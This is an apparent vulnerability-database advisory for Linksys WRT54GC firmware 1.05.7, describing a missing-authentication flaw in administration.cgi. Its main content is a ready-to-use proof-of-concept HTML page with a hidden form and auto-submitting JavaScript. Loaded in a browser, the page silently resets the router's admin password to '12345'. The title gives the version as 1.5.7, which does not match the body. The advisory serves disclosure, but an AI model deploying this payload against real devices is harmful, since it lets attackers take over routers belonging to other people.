Linksys WRT54GC 1.5.7 (Firmware) 'administration.cgi' Access Validation Vulnerability

2014-07-01T00:00:00
ID SSV:86192
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications.

Successful attacks will lead to a compromise of the vulnerable device, which may lead to further attacks.

Linksys WRT54GC running firmware 1.05.7 is vulnerable; other versions may also be affected.

                                        
                                            
                                                <html><body> <form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data"> <INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21> <INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21> </form> <!-- C?digo de envio autom?tico do formul?rio --> <SCRIPT language="JavaScript"> document.senha.submit(); </SCRIPT>